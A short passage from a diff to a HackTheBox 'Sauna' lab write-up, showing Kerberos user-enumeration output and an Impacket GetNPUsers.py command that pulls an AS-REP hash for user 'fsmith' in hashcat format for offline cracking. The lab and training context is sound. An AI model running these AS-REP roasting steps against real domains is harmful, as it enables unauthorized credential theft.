jib1337/writeups_public/HackTheBox/HTB_Sauna/README.md

 [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
 ```
-This returns a hash, which means a valid user "fsmith" has been found.
+This returns an encrypted AS_REP message, which means a valid user "fsmith" has been found with pre-authentication not required.
 Export the hash in a crackable format for hashcat:
 ```bash
 kali@kali:/usr/share/doc/python3-impacket/examples$ /usr/share/doc/python3-impacket/examples/GetNPUsers.py -dc-ip 10.10.10.175 -no-pass -usersfile ~/Desktop/htb/sauna/users.txt 'egotistical-bank.local/' -format hashcat